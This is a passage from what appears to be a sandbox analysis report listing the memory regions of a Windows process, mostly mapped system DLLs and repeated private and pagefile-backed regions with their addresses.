end_va = 0x7fefc443fff monitored = 0 entry_point = 0x7fefc3dc924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 735 start_va = 0x7fefc450000 end_va = 0x7fefc559fff monitored = 0 entry_point = 0x7fefc451010 region_type = mapped_file name = "cryptui.dll" filename = "\\Windows\\System32\\cryptui.dll" (normalized: "c:\\windows\\system32\\cryptui.dll") Region: id = 736 start_va = 0x7fefc560000 end_va = 0x7fefc739fff monitored = 0 entry_point = 0x7fefc563130 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 737 start_va = 0x7fefc740000 end_va = 0x7fefc76cfff monitored = 0 entry_point = 0x7fefc741010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 738 start_va = 0x7fefc910000 end_va = 0x7fefc91bfff monitored = 0 entry_point = 0x7fefc911064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 739 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 740 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 741 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 742 start_va = 0x7fefd150000 end_va = 0x7fefd181fff monitored = 0 entry_point = 0x7fefd15144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 743 start_va = 0x7fefd250000 end_va = 0x7fefd2bcfff monitored = 0 entry_point = 0x7fefd251010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 744 start_va = 0x7fefd540000 end_va = 0x7fefd562fff monitored = 0 entry_point = 0x7fefd541198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 745 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff monitored = 0 entry_point = 0x7fefd5e1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 746 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 747 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 748 start_va = 0x7fefd650000 end_va = 0x7fefd6e0fff monitored = 0 entry_point = 0x7fefd651440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 749 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 750 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 751 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 752 start_va = 0x7fefd7f0000 end_va = 0x7fefd7fefff monitored = 0 entry_point = 0x7fefd7f1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 753 start_va = 0x7fefd800000 end_va = 0x7fefd96cfff monitored = 0 entry_point = 0x7fefd8010b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 754 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 755 start_va = 0x7fefd9e0000 end_va = 0x7fefda1afff monitored = 0 entry_point = 0x7fefd9e1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 756 start_va = 0x7fefda20000 end_va = 0x7fefda55fff monitored = 0 entry_point = 0x7fefda21474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 757 start_va = 0x7fefda60000 end_va = 0x7fefda79fff monitored = 0 entry_point = 0x7fefda61558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 758 start_va = 0x7fefdb20000 end_va = 0x7fefdc97fff monitored = 0 entry_point = 0x7fefdb210e0 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 759 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 760 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 761 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 762 start_va = 0x7fefdee0000 end_va = 0x7fefec67fff monitored = 0 entry_point = 0x7fefdf5cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 763 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 764 start_va = 0x7fefee00000 end_va = 0x7fefef29fff monitored = 0 entry_point = 0x7fefee010d4 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 765 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 766 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 767 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 768 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 769 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 770 start_va = 0x7feff180000 end_va = 0x7feff1d1fff monitored = 0 entry_point = 0x7feff1810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 771 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 772 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 773 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 774 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 775 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 776 start_va = 0x7feff680000 end_va = 0x7feff856fff monitored = 0 entry_point = 0x7feff681010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 777 start_va = 0x7feff860000 end_va = 0x7feffab8fff monitored = 0 entry_point = 0x7feff861340 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 778 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 779 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 780 start_va = 0x7fffff6a000 end_va = 0x7fffff6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6a000" filename = "" Region: id = 781 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 782 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 783 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 784 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 785 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 786 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 787 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 788 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 789 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 790 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 791 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 792 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 793 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 794 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 795 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 796 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 797 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 798 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 799 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 800 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 801 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 802 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 803 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 804 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 805 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 806 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 807 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 808 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 809 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 810 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 811 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 812 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 813 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 815 start_va = 0x3a10000 end_va = 0x3a25fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 816 start_va = 0x7560000 end_va = 0x75dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007560000" filename = "" Region: id = 817 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 818 start_va = 0x9630000 end_va = 0x984ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009630000" filename = "" Region: id = 819 start_va = 0x7fef5a80000 end_va = 0x7fef5af0fff monitored = 0 entry_point = 0x7fef5a81010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 820 start_va = 0x7fef5a10000 end_va = 0x7fef5a73fff monitored = 0 entry_point = 0x7fef5a11254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 821 start_va = 0x7fefce60000 end_va = 0x7fefcebafff monitored = 0 entry_point = 0x7fefce66940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 822 start_va = 0x6b10000 end_va = 0x6beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b10000" filename = "" Region: id = 823 start_va = 0x3950000 end_va = 0x395ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003950000" filename = "" Region: id = 824 start_va = 0x5d00000 end_va = 0x5d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d00000" filename = "" Region: id = 825 start_va = 0x7bc0000 end_va = 0x7c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007bc0000" filename = "" Region: id = 826 start_va = 0x7fffff78000 end_va = 0x7fffff79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 827 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 828 start_va = 0x46a0000 end_va = 0x46b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 829 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 830 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 831 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 832 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 833 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 834 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 835 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 836 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 837 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 838 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 839 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 840 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 841 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 842 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 843 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 844 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 845 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 846 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 847 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 848 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 849 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 850 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 851 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 852 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 853 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 854 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 855 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 856 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 857 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 858 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 859 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 860 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 861 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 862 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 863 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 864 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 865 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 866 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 867 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 868 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 869 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 870 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 871 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 872 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 873 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 874 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 875 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 876 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 877 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 878 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 879 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 880 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 881 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 882 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 883 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 884 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 885 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 886 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 887 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 888 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 889 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 890 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 891 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 892 start_va = 0x3950000 end_va = 